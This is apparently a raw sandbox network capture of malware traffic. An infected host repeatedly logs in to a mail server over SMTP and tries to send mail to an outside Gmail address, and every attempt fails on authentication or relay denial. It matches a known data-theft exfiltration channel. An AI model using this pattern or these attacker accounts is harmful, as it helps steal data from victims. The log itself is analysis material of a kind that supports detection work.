                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:55.472634077 CEST61581587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:55.632110119 CEST58761581208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:57.095818043 CEST58761580208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:57.095990896 CEST61580587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:57.252223969 CEST58761580208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:57.252358913 CEST61580587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:57.423799992 CEST58761580208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:57.516980886 CEST58761581208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:57.518820047 CEST61581587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:57.675822973 CEST58761581208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:57.675935030 CEST61581587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:57.850164890 CEST58761581208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:58.917659044 CEST58761584208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:58.918453932 CEST61584587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:59.072770119 CEST58761584208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:59.072951078 CEST61584587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:59.230300903 CEST58761584208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:59.320465088 CEST58761585208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:59.320708036 CEST61585587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:59.475060940 CEST58761585208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:59.475291967 CEST61585587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:59.631169081 CEST58761585208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:01.745038986 CEST58761585208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:01.745058060 CEST58761584208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:01.745069981 CEST58761585208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:01.745079041 CEST58761584208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:01.745377064 CEST61584587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:01.745385885 CEST61585587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:01.901344061 CEST58761585208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:01.902329922 CEST58761584208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:01.914429903 CEST61584587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:01.914556980 CEST61585587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:02.086132050 CEST58761584208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:02.097554922 CEST58761585208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:03.693058014 CEST58761588208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:03.693173885 CEST61588587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:23:03.704713106 CEST58761589208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:03.704821110 CEST61589587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:23:03.920624018 CEST58761588208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:03.920643091 CEST58761589208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:03.920769930 CEST61589587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:03.920780897 CEST61588587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:04.077073097 CEST58761589208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:04.081255913 CEST58761588208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:06.452718973 CEST58761588208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:06.456331015 CEST61588587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:06.710851908 CEST58761589208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:06.711446047 CEST61589587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:06.711734056 CEST58761588208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:06.716608047 CEST61588587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:06.867896080 CEST58761589208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:06.874658108 CEST61589587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:06.893332958 CEST58761588208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:07.056268930 CEST58761589208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:08.492945910 CEST58761592208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:08.493108034 CEST61592587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:08.653276920 CEST58761592208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:08.653450012 CEST61592587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:08.816603899 CEST58761592208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:08.910904884 CEST58761593208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:08.911120892 CEST61593587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:09.072935104 CEST58761593208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:09.073097944 CEST61593587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:09.237623930 CEST58761593208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:10.524976015 CEST58761592208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:10.525319099 CEST61592587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:10.687833071 CEST58761592208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:10.688066959 CEST61592587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:10.864784956 CEST58761592208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:11.454634905 CEST58761593208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:11.454828978 CEST61593587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:11.618612051 CEST58761593208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:11.618769884 CEST61593587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:11.799143076 CEST58761593208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:12.406800985 CEST58761596208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:12.408338070 CEST61596587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:12.569782019 CEST58761596208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:12.573373079 CEST61596587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:12.735512018 CEST58761596208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:13.297363997 CEST58761597208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:13.297533035 CEST61597587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:13.451862097 CEST58761597208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:13.452032089 CEST61597587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:13.609651089 CEST58761597208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:14.456598043 CEST58761596208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:14.464150906 CEST61596587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:14.626638889 CEST58761596208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:14.627041101 CEST61596587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:14.822629929 CEST58761596208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:15.451162100 CEST58761597208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:15.451296091 CEST61597587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:15.609046936 CEST58761597208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:15.609165907 CEST61597587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:15.783632040 CEST58761597208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:16.315160990 CEST58761599208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:16.315447092 CEST61599587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:16.471266985 CEST58761599208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:16.472295046 CEST61599587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:16.630070925 CEST58761599208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:17.257338047 CEST58761601208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:17.257496119 CEST61601587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:17.412421942 CEST58761601208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:17.412594080 CEST61601587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:17.570600986 CEST58761601208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:18.630731106 CEST58761599208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:18.630966902 CEST61599587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:18.790747881 CEST58761599208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:18.793344021 CEST61599587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:18.985246897 CEST58761599208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:19.705338955 CEST58761601208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:19.705509901 CEST61601587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:19.863568068 CEST58761601208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:19.863692999 CEST61601587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:20.039191961 CEST58761601208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:21.621519089 CEST58761606208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:21.621706009 CEST61606587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:21.776823997 CEST58761606208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:21.777040005 CEST61606587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:21.933871031 CEST58761606208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:22.213206053 CEST58761607208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:22.214399099 CEST61607587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:22.368962049 CEST58761607208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:22.369407892 CEST61607587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:22.615530968 CEST58761607208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:24.547962904 CEST58761606208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:24.548032045 CEST58761607208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:24.550306082 CEST61607587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:24.550311089 CEST61606587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:24.705976963 CEST58761606208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:24.707268000 CEST61606587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:24.707547903 CEST58761607208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:24.707931042 CEST61607587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:24.881469011 CEST58761606208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:24.895639896 CEST58761607208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:26.537013054 CEST58761610208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:26.541589975 CEST61610587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:26.702826977 CEST58761610208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:26.707175016 CEST61610587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:26.868168116 CEST58761610208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:27.903165102 CEST58761613208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:27.903302908 CEST61613587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:28.105859041 CEST58761613208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:28.259233952 CEST58761613208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:28.260332108 CEST61613587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:28.419948101 CEST58761613208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:29.650490046 CEST58761615208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:29.650652885 CEST61615587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:29.804718018 CEST58761615208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:29.804932117 CEST61615587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:29.961486101 CEST58761615208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:30.524987936 CEST58761613208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:30.525757074 CEST61613587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:30.683993101 CEST58761613208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:30.686933041 CEST61613587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:30.862051964 CEST58761613208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:32.441272020 CEST58761617208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:32.442187071 CEST61617587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:32.458477974 CEST58761615208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:32.458758116 CEST61615587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:32.783632994 CEST58761617208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:32.783655882 CEST58761615208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:32.783857107 CEST61617587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:32.783863068 CEST61615587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:32.942128897 CEST58761617208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:32.957690954 CEST58761615208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:34.450143099 CEST58761620208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:34.456211090 CEST61620587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:34.611334085 CEST58761620208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:34.618262053 CEST61620587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:34.776355028 CEST58761620208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:35.322732925 CEST58761621208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:35.322952986 CEST61621587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:35.479433060 CEST58761621208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:35.479576111 CEST61621587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:35.798109055 CEST58761621208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
